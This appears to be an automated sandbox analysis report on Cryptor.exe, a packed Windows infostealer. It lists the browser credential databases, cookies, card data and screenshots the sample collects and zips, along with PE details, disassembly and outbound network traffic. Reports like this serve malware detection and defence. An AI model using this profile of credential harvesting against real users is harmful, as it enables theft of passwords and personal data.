wN.w...P.7..Z......d..!/_.h5.......t.7+..&................ixr..U.go..9....YhBuLc...P..$...V.\|.+wS[...e.x.vK='ma........c[5Q........3...LXj...[.c...g...#.J...........9.v

C:\Users\user\AppData\Local\Temp\GUSNUBAIEi2BKK2Fv27qNATlfJxDpw\user_info.txt

Download File

Process:	C:\Users\user\Desktop\Cryptor.exe
File Type:	Unicode text, UTF-8 text, with CRLF, LF line terminators
Category:	dropped
Size (bytes):	664
Entropy (8bit):	5.351683964758398
Encrypted:	false
SSDEEP:	12:eM36nIQN3eyQ8Xx6YL5SrJFKllQM7NlVrbBQM3aWfgyIHdAej01mMXaBLF:exVNbNxV1YHM7NlVrbe8dOAejUmMqBLF
MD5:	A347657D82024D74C1EB5258671F4FE3
SHA1:	602F230FBF4E6921F08A89B3A47B2A62B0407E0C
SHA-256:	79F98F543014E786BB07A29244DBBFFC0014DFA28EC18F70A1B94F9B56BAF5EF
SHA-512:	446E57A518C9A3D078458A8E01B47448D6C604A5294F08A2C61ACAD5F3FBABA7F16F2B3D06D14057EC3A4C0A15F63800B78CF5CBA85B531982B14357052E273E
Malicious:	false
Reputation:	low
Preview:	..- IP Info -....IP: 173.254.250.91..Country: United States..City: Dallas..Postal: 75201..ISP: Quadranet Enterprises LLC - A8100..Timezone: -05:00....- PC Info -....Username: user..OS: Microsoft Windows 10 Pro..CPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz..GPU: .. - RZTBNVDC (1280, 1024)..HWID: 3165415708104312..Current Language: English (United States)..FileLocation: C:\Users\user\Desktop\Cryptor.exe..Is Elevated: true....- Other Info -....Antivirus: .. - Windows Defender....- Log Info -......Build:_____....Passwords: ....Cookies: . 25...Wallets: ....Files: . 20...Credit Cards: ....Servers FTP/SSH: ....Discord Tokens: ....Others: ..

C:\Users\user\AppData\Local\Temp\History

Download File

Process:	C:\Users\user\Desktop\Cryptor.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	126976
Entropy (8bit):	0.47147045728725767
Encrypted:	false
SSDEEP:	96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
MD5:	A2D1F4CF66465F9F0CAC61C4A95C7EDE
SHA1:	BA6A845E247B221AAEC96C4213E1FD3744B10A27
SHA-256:	B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
SHA-512:	C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Login Data

Download File

Process:	C:\Users\user\Desktop\Cryptor.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Web Data

Download File

Process:	C:\Users\user\Desktop\Cryptor.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wdrfuzpy.3oc.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xdm5rzwx.vqg.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\out.zip

Download File

Process:	C:\Users\user\Desktop\Cryptor.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=store
Category:	dropped
Size (bytes):	893356
Entropy (8bit):	7.5310611393368
Encrypted:	false
SSDEEP:	24576:ZSyz3aDtOLvIaUqKvppJW+JsBTEX3RsNwowc:H7AOLvIdTBsNwowc
MD5:	CCE2D9CA7B9DD557008661E8FE02F86A
SHA1:	6410B12363A2CCEA0C496E1D7D2B24198B4BB935
SHA-256:	B8FB66EC834175427B81A28F8F72F87D2B0EC929FA6762899257B2ABB194C900
SHA-512:	960149863B8C1E07BAC933BCE589AE2378DDBD4BBD97BF24E9530C2C9911DFE3A519B1333012FB53F3C7F0675DB31D8EA907A71FA194C8065055EE883EE3525F
Malicious:	false
Preview:	PK........0..X................Autofill/PK........0..X................Cookies/PK........0..X................CreditCards/PK........0..X................Downloads/PK........0..X................History/PK........0..X................Passwords/PK........0..X.1...L...L......screen1.png.PNG........IHDR................C..K.IDATx.....$I.$I.....GDDfffVUUUUwwwww......................................................................................twwwwWWUUUUffFFD......LfWwuwwO.....L...}..*y...'.y..+.l.%2.)ls....6..<...n.s...$I..?....6....m.#...B...6..a./......d..E.g.^..02.f....\f.I<.m....E....6...>...P..Ti.#.._C<'..{..~.a..f..F...m.-...l.f.oa.+.....m^..9..2...y....6...BI.6.yad./...\f....$.l.`..I..6...m.l#....~...@.l.y.4...s...c..tQ..s...m$!..D....M...\&..$.g........#3..$.2...$. ....6..L.".....`V;2..m.$q.. 3..@D ....6/.....6..."..`.G$....6..D..Mfb.IH"3....l.mZkd&.A.....$..m..!....6...M)..t].m.i""..m$.....$$......~....2M..I)....6....m$..H"....$$a....&3...$.$.....@...L.$!.$.d&.....2...6.

C:\Users\user\AppData\Local\Temp\sensitive-files.zip

Download File

Process:	C:\Users\user\Desktop\Cryptor.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=deflate
Category:	dropped
Size (bytes):	14986
Entropy (8bit):	7.825969307820179
Encrypted:	false
SSDEEP:	384:BP8iBh49agvSv/kX1ZIP8iBh49agvSv/kX1ZT+:98c49XvSv/kFZU8c49XvSv/kFZq
MD5:	6AC5CB240B1E6DCF4A32C5654DBD47B1
SHA1:	410BEAEE88F8583C262B55726808F8DB608A9FE3
SHA-256:	896E9138581E56AD91F482A6CCCCB48FEAD0668B0CA90BEA80EEF31CB2F123BF
SHA-512:	ADA51F0DDA302BBFD1A96113D76429E4A24DC7817EA694B03DC41BC1EF124B0BA1EF0CF72759CCBEFCF34BB624C852F7513D994AF5C462BE782BA8508F3F2735
Malicious:	false
Preview:	PK........,..X...............DVWHKMNFNN.png..Ir@!.D....?....p...l....aeA..K...E.....[.ph..kQ..T..j.uUnVT.$U...K7+}lZ..I.](.X..5b>..M.".uSl....u....\|.c..'}.U ....2.'....U0A..*qO..v.9X.Z...n.E}....us..,]...[g.:..-...6:_.PK...H...=..P...q....).@d^..Ou..W.S.=.....d..[!..L...rr]C.M&S.E}.e:>K.[...U.......;.F.Z.vW.6.,.r.[...hh;......\.Cm.p......-_..d..Q.. .i.6..J..........\|.C.Dp.....).....o8.,...SV..2\$p.eNG......^.(-....7...RA.j......q..U;...<#VZ.Ut...6......h.........2.Kf......j8.......>W...u...4..d..z.>...s..9.p.Q.)...t<...`.m..R.(.\|w.!.....J.y.]j...-......[.-{3..W.=..\.M<O..$...}...G.;n..N.......w.W...f..$.y.$jw...N7..=:.....K..=..."[?2....PK........,..XP..............HTAGVDFUIE.jpg..Ir@!.D.....#..N.?H..(.._d....\....7...0...Q.}SU]?P:]p......X?:i.L.L.Z....k. ..4.. wN.w...P.7..Z......d..!/_.h5.......t.7+..&................ixr..U.go..9....YhBuLc...P..$...V.\|.+wS[...e.x.vK='ma........c[5Q........3...LXj...[.c...g...#.J...........9.v

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm

Download File

Process:	C:\Users\user\Desktop\Cryptor.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32+ executable (GUI) x86-64, for MS Windows
Entropy (8bit):	7.788984142487068
TrID:	Win64 Executable GUI (202006/5) 81.26% UPX compressed Win32 Executable (30571/9) 12.30% Win64 Executable (generic) (12005/4) 4.83% Generic Win/DOS Executable (2004/3) 0.81% DOS Executable Generic (2002/1) 0.81%
File name:	Cryptor.exe
File size:	3'037'184 bytes
MD5:	4ca40d9d318d97d68fcb518e2c4fe07a
SHA1:	5fc2e90b7bc1aa4d00c2dc9e0064056b3956e425
SHA256:	7f988e3a23998e57784262affa784e9cc63ee9494ece3bf5274a7433f4ffab46
SHA512:	bc3133b4c1da31037eaa2313e427161e7402be8e305e744bec00d294e6c7c95d5abba1bf45dbcf861935224d9213c190392443ca7447e0c6c71e512eb5dee7f2
SSDEEP:	49152:yG3XVai+IaMqPPgeT+B2GDsp8aTvMf1p8LEh3ZDJgD3WIPvozJO7caDV2aK:yqXVD7deT+spnU80JDJi3WgQtAVDcaK
TLSH:	DCE533CF951086DDF3E3F2B58B39B885D792A82A9B0EB0171EF5359422B68F015DF601
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......{.dC?...?...?...6...-..._......._...2..._...6.......)...+...<...?.......[...%...?...8...[...>...Rich?..........................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x140545760
Entrypoint Section:	UPX1
Digitally signed:	false
Imagebase:	0x140000000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x664FF26D [Fri May 24 01:50:37 2024 UTC]
TLS Callbacks:	0x405459de, 0x1
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	e8effc9201cf1e60acc68af88aec3bd3

Entrypoint Preview

Instruction
push ebx
push esi
push edi
push ebp
dec eax
lea esi, dword ptr [FFD1B895h]
dec eax
lea edi, dword ptr [esi-00260000h]
dec eax
lea eax, dword ptr [edi+0051E7B8h]
push dword ptr [eax]
mov dword ptr [eax], 0F61AFD7h
push eax
push edi
xor ebx, ebx
xor ecx, ecx
dec eax
or ebp, FFFFFFFFh
call 00007F5E78EF5355h
add ebx, ebx
je 00007F5E78EF5304h
rep ret
mov ebx, dword ptr [esi]
dec eax
sub esi, FFFFFFFCh
adc ebx, ebx
mov dl, byte ptr [esi]
rep ret
dec eax
lea eax, dword ptr [edi+ebp]
cmp ecx, 05h
mov dl, byte ptr [eax]
jbe 00007F5E78EF5323h
dec eax
cmp ebp, FFFFFFFCh
jnbe 00007F5E78EF531Dh
sub ecx, 04h
mov edx, dword ptr [eax]
dec eax
add eax, 04h
sub ecx, 04h
mov dword ptr [edi], edx
dec eax
lea edi, dword ptr [edi+04h]
jnc 00007F5E78EF52F1h
add ecx, 04h
mov dl, byte ptr [eax]
je 00007F5E78EF5312h
dec eax
inc eax
mov byte ptr [edi], dl
sub ecx, 01h
mov dl, byte ptr [eax]
dec eax
lea edi, dword ptr [edi+01h]
jne 00007F5E78EF52F2h
rep ret
cld
inc ecx
pop ebx
jmp 00007F5E78EF530Ah
dec eax
inc esi
mov byte ptr [edi], dl
dec eax
inc edi
mov dl, byte ptr [esi]
add ebx, ebx
jne 00007F5E78EF530Ch
mov ebx, dword ptr [esi]
dec eax
sub esi, FFFFFFFCh
adc ebx, ebx
mov dl, byte ptr [esi]
jc 00007F5E78EF52E8h
lea eax, dword ptr [ecx+01h]
inc ecx
call ebx
adc eax, eax
add ebx, ebx
jne 00007F5E78EF530Ch
mov ebx, dword ptr [esi]
dec eax
sub esi, FFFFFFFCh
adc ebx, ebx
mov dl, byte ptr [esi]
jnc 00007F5E78EF52EDh
sub eax, 03h
jc 00007F5E78EF5315h
shl eax, 08h
movzx edx, dl
or eax, edx
dec eax
inc esi

Rich Headers

Programming Language:

[IMP] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x546000	0x5b4	UPX2
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x520000	0x14850	UPX1
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x5465b4	0x24	UPX2
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x545a08	0x28	UPX1
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x545bf8	0x140	UPX1
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
UPX0	0x1000	0x260000	0x0	d41d8cd98f00b204e9800998ecf8427e	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
UPX1	0x261000	0x2e5000	0x2e4e00	a1acfd845da8c009c1a6d73a3a61451b	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
UPX2	0x546000	0x1000	0x600	c305c9cfad767b08ef7a273bcac25795	False	0.3821614583333333	data	3.884559047710082	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Imports

DLL	Import
advapi32.dll	FreeSid
api-ms-win-crt-heap-l1-1-0.dll	free
api-ms-win-crt-locale-l1-1-0.dll	_configthreadlocale
api-ms-win-crt-math-l1-1-0.dll	log
api-ms-win-crt-runtime-l1-1-0.dll	exit
api-ms-win-crt-stdio-l1-1-0.dll	_set_fmode
api-ms-win-crt-string-l1-1-0.dll	strlen
api-ms-win-crt-time-l1-1-0.dll	_localtime64_s
api-ms-win-crt-utility-l1-1-0.dll	qsort
bcrypt.dll	BCryptGenRandom
crypt32.dll	CertOpenStore
gdi32.dll	DeleteDC
KERNEL32.DLL	LoadLibraryA, ExitProcess, GetProcAddress, VirtualProtect
ntdll.dll	RtlUnwindEx
ole32.dll	CoInitializeEx
oleaut32.dll	VariantClear
rstrtmgr.dll	RmGetList
secur32.dll	DecryptMessage
user32.dll	GetMonitorInfoW
ws2_32.dll	bind

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jun 1, 2024 18:36:58.372777939 CEST	49730	80	192.168.2.4	195.201.57.90
Jun 1, 2024 18:36:58.377827883 CEST	80	49730	195.201.57.90	192.168.2.4
Jun 1, 2024 18:36:58.377924919 CEST	49730	80	192.168.2.4	195.201.57.90
Jun 1, 2024 18:36:58.397267103 CEST	49730	80	192.168.2.4	195.201.57.90
Jun 1, 2024 18:36:58.402318001 CEST	80	49730	195.201.57.90	192.168.2.4
Jun 1, 2024 18:36:59.219366074 CEST	80	49730	195.201.57.90	192.168.2.4
Jun 1, 2024 18:36:59.219988108 CEST	49730	80	192.168.2.4	195.201.57.90
Jun 1, 2024 18:36:59.225430012 CEST	80	49730	195.201.57.90	192.168.2.4
Jun 1, 2024 18:36:59.225553989 CEST	49730	80	192.168.2.4	195.201.57.90
Jun 1, 2024 18:37:10.487957954 CEST	49731	443	192.168.2.4	149.154.167.220
Jun 1, 2024 18:37:10.487988949 CEST	443	49731	149.154.167.220	192.168.2.4
Jun 1, 2024 18:37:10.488085985 CEST	49731	443	192.168.2.4	149.154.167.220
Jun 1, 2024 18:37:10.557395935 CEST	49731	443	192.168.2.4	149.154.167.220
Jun 1, 2024 18:37:10.557432890 CEST	443	49731	149.154.167.220	192.168.2.4
Jun 1, 2024 18:37:11.575901985 CEST	443	49731	149.154.167.220	192.168.2.4
Jun 1, 2024 18:37:11.576019049 CEST	49731	443	192.168.2.4	149.154.167.220
Jun 1, 2024 18:37:11.579473019 CEST	49731	443	192.168.2.4	149.154.167.220
Jun 1, 2024 18:37:11.579504967 CEST	443	49731	149.154.167.220	192.168.2.4
Jun 1, 2024 18:37:11.579778910 CEST	443	49731	149.154.167.220	192.168.2.4
Jun 1, 2024 18:37:11.621623039 CEST	49731	443	192.168.2.4	149.154.167.220
Jun 1, 2024 18:37:11.665982962 CEST	49731	443	192.168.2.4	149.154.167.220
Jun 1, 2024 18:37:11.666059017 CEST	443	49731	149.154.167.220	192.168.2.4
Jun 1, 2024 18:37:11.666169882 CEST	49731	443	192.168.2.4	149.154.167.220
Jun 1, 2024 18:37:11.666213036 CEST	443	49731	149.154.167.220	192.168.2.4
Jun 1, 2024 18:37:11.666321039 CEST	49731	443	192.168.2.4	149.154.167.220
Jun 1, 2024 18:37:11.666364908 CEST	49731	443	192.168.2.4	149.154.167.220
Jun 1, 2024 18:37:11.666419029 CEST	443	49731	149.154.167.220	192.168.2.4
Jun 1, 2024 18:37:11.666513920 CEST	49731	443	192.168.2.4	149.154.167.220
Jun 1, 2024 18:37:11.666552067 CEST	443	49731	149.154.167.220	192.168.2.4
Jun 1, 2024 18:37:11.666584969 CEST	49731	443	192.168.2.4	149.154.167.220
Jun 1, 2024 18:37:11.666605949 CEST	443	49731	149.154.167.220	192.168.2.4
Jun 1, 2024 18:37:11.666640043 CEST	49731	443	192.168.2.4	149.154.167.220
Jun 1, 2024 18:37:11.666680098 CEST	443	49731	149.154.167.220	192.168.2.4
Jun 1, 2024 18:37:11.666693926 CEST	49731	443	192.168.2.4	149.154.167.220
Jun 1, 2024 18:37:11.666721106 CEST	443	49731	149.154.167.220	192.168.2.4
Jun 1, 2024 18:37:11.666727066 CEST	49731	443	192.168.2.4	149.154.167.220
Jun 1, 2024 18:37:11.666748047 CEST	443	49731	149.154.167.220	192.168.2.4
Jun 1, 2024 18:37:11.666764975 CEST	49731	443	192.168.2.4	149.154.167.220
Jun 1, 2024 18:37:11.666781902 CEST	49731	443	192.168.2.4	149.154.167.220
Jun 1, 2024 18:37:11.666796923 CEST	443	49731	149.154.167.220	192.168.2.4
Jun 1, 2024 18:37:11.666832924 CEST	49731	443	192.168.2.4	149.154.167.220
Jun 1, 2024 18:37:11.666853905 CEST	443	49731	149.154.167.220	192.168.2.4
Jun 1, 2024 18:37:11.666884899 CEST	49731	443	192.168.2.4	149.154.167.220
Jun 1, 2024 18:37:11.666904926 CEST	443	49731	149.154.167.220	192.168.2.4
Jun 1, 2024 18:37:11.666949987 CEST	49731	443	192.168.2.4	149.154.167.220
Jun 1, 2024 18:37:11.666973114 CEST	443	49731	149.154.167.220	192.168.2.4
Jun 1, 2024 18:37:11.666996002 CEST	49731	443	192.168.2.4	149.154.167.220
Jun 1, 2024 18:37:11.667053938 CEST	443	49731	149.154.167.220	192.168.2.4
Jun 1, 2024 18:37:11.667134047 CEST	49731	443	192.168.2.4	149.154.167.220
Jun 1, 2024 18:37:11.667155027 CEST	443	49731	149.154.167.220	192.168.2.4
Jun 1, 2024 18:37:11.667201042 CEST	49731	443	192.168.2.4	149.154.167.220
Jun 1, 2024 18:37:11.667227983 CEST	443	49731	149.154.167.220	192.168.2.4
Jun 1, 2024 18:37:11.667267084 CEST	49731	443	192.168.2.4	149.154.167.220
Jun 1, 2024 18:37:11.667294025 CEST	443	49731	149.154.167.220	192.168.2.4
Jun 1, 2024 18:37:11.667330027 CEST	49731	443	192.168.2.4	149.154.167.220
Jun 1, 2024 18:37:11.667346001 CEST	443	49731	149.154.167.220	192.168.2.4
Jun 1, 2024 18:37:11.667361021 CEST	49731	443	192.168.2.4	149.154.167.220
Jun 1, 2024 18:37:11.667387009 CEST	49731	443	192.168.2.4	149.154.167.220
Jun 1, 2024 18:37:11.667402983 CEST	443	49731	149.154.167.220	192.168.2.4
Jun 1, 2024 18:37:11.667428017 CEST	49731	443	192.168.2.4	149.154.167.220
Jun 1, 2024 18:37:11.667469978 CEST	49731	443	192.168.2.4	149.154.167.220
Jun 1, 2024 18:37:11.667517900 CEST	49731	443	192.168.2.4	149.154.167.220
Jun 1, 2024 18:37:11.667551041 CEST	49731	443	192.168.2.4	149.154.167.220
Jun 1, 2024 18:37:11.667568922 CEST	49731	443	192.168.2.4	149.154.167.220
Jun 1, 2024 18:37:11.667591095 CEST	49731	443	192.168.2.4	149.154.167.220
Jun 1, 2024 18:37:11.667618990 CEST	49731	443	192.168.2.4	149.154.167.220
Jun 1, 2024 18:37:11.667649031 CEST	49731	443	192.168.2.4	149.154.167.220
Jun 1, 2024 18:37:11.667679071 CEST	49731	443	192.168.2.4	149.154.167.220
Jun 1, 2024 18:37:11.676888943 CEST	443	49731	149.154.167.220	192.168.2.4
Jun 1, 2024 18:37:11.677073956 CEST	49731	443	192.168.2.4	149.154.167.220
Jun 1, 2024 18:37:11.677095890 CEST	443	49731	149.154.167.220	192.168.2.4
Jun 1, 2024 18:37:11.677110910 CEST	49731	443	192.168.2.4	149.154.167.220
Jun 1, 2024 18:37:11.677129984 CEST	49731	443	192.168.2.4	149.154.167.220
Jun 1, 2024 18:37:11.677143097 CEST	49731	443	192.168.2.4	149.154.167.220
Jun 1, 2024 18:37:11.677159071 CEST	49731	443	192.168.2.4	149.154.167.220
Jun 1, 2024 18:37:11.677169085 CEST	49731	443	192.168.2.4	149.154.167.220
Jun 1, 2024 18:37:11.677180052 CEST	49731	443	192.168.2.4	149.154.167.220
Jun 1, 2024 18:37:11.677195072 CEST	49731	443	192.168.2.4	149.154.167.220
Jun 1, 2024 18:37:11.677201033 CEST	49731	443	192.168.2.4	149.154.167.220
Jun 1, 2024 18:37:11.677212954 CEST	49731	443	192.168.2.4	149.154.167.220
Jun 1, 2024 18:37:11.677237988 CEST	49731	443	192.168.2.4	149.154.167.220
Jun 1, 2024 18:37:11.677273035 CEST	49731	443	192.168.2.4	149.154.167.220
Jun 1, 2024 18:37:11.677289009 CEST	49731	443	192.168.2.4	149.154.167.220
Jun 1, 2024 18:37:11.677314043 CEST	49731	443	192.168.2.4	149.154.167.220
Jun 1, 2024 18:37:11.677356005 CEST	49731	443	192.168.2.4	149.154.167.220
Jun 1, 2024 18:37:11.677376032 CEST	49731	443	192.168.2.4	149.154.167.220
Jun 1, 2024 18:37:11.677393913 CEST	49731	443	192.168.2.4	149.154.167.220
Jun 1, 2024 18:37:11.677402973 CEST	49731	443	192.168.2.4	149.154.167.220
Jun 1, 2024 18:37:11.677432060 CEST	49731	443	192.168.2.4	149.154.167.220
Jun 1, 2024 18:37:11.681803942 CEST	443	49731	149.154.167.220	192.168.2.4
Jun 1, 2024 18:37:11.681905985 CEST	49731	443	192.168.2.4	149.154.167.220
Jun 1, 2024 18:37:11.681993008 CEST	49731	443	192.168.2.4	149.154.167.220
Jun 1, 2024 18:37:11.681994915 CEST	443	49731	149.154.167.220	192.168.2.4
Jun 1, 2024 18:37:11.682034016 CEST	443	49731	149.154.167.220	192.168.2.4
Jun 1, 2024 18:37:11.682039976 CEST	49731	443	192.168.2.4	149.154.167.220
Jun 1, 2024 18:37:11.682107925 CEST	49731	443	192.168.2.4	149.154.167.220
Jun 1, 2024 18:37:11.682126045 CEST	443	49731	149.154.167.220	192.168.2.4
Jun 1, 2024 18:37:11.682133913 CEST	49731	443	192.168.2.4	149.154.167.220
Jun 1, 2024 18:37:11.682166100 CEST	49731	443	192.168.2.4	149.154.167.220
Jun 1, 2024 18:37:11.682193041 CEST	443	49731	149.154.167.220	192.168.2.4
Jun 1, 2024 18:37:11.682218075 CEST	49731	443	192.168.2.4	149.154.167.220
Jun 1, 2024 18:37:11.682235003 CEST	443	49731	149.154.167.220	192.168.2.4
Jun 1, 2024 18:37:11.682250023 CEST	49731	443	192.168.2.4	149.154.167.220
Jun 1, 2024 18:37:11.682276964 CEST	49731	443	192.168.2.4	149.154.167.220
Jun 1, 2024 18:37:11.682291985 CEST	443	49731	149.154.167.220	192.168.2.4
Jun 1, 2024 18:37:11.682327986 CEST	443	49731	149.154.167.220	192.168.2.4
Jun 1, 2024 18:37:13.017663956 CEST	443	49731	149.154.167.220	192.168.2.4
Jun 1, 2024 18:37:13.059201956 CEST	49731	443	192.168.2.4	149.154.167.220
Jun 1, 2024 18:37:13.059220076 CEST	443	49731	149.154.167.220	192.168.2.4
Jun 1, 2024 18:37:13.060796022 CEST	49731	443	192.168.2.4	149.154.167.220
Jun 1, 2024 18:37:13.060873985 CEST	49731	443	192.168.2.4	149.154.167.220
Jun 1, 2024 18:37:13.061029911 CEST	443	49731	149.154.167.220	192.168.2.4
Jun 1, 2024 18:37:13.061155081 CEST	443	49731	149.154.167.220	192.168.2.4
Jun 1, 2024 18:37:13.061183929 CEST	49731	443	192.168.2.4	149.154.167.220
Jun 1, 2024 18:37:13.061223984 CEST	49731	443	192.168.2.4	149.154.167.220

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jun 1, 2024 18:36:58.360687017 CEST	51141	53	192.168.2.4	1.1.1.1
Jun 1, 2024 18:36:58.367981911 CEST	53	51141	1.1.1.1	192.168.2.4
Jun 1, 2024 18:37:10.479676008 CEST	51486	53	192.168.2.4	1.1.1.1
Jun 1, 2024 18:37:10.487155914 CEST	53	51486	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
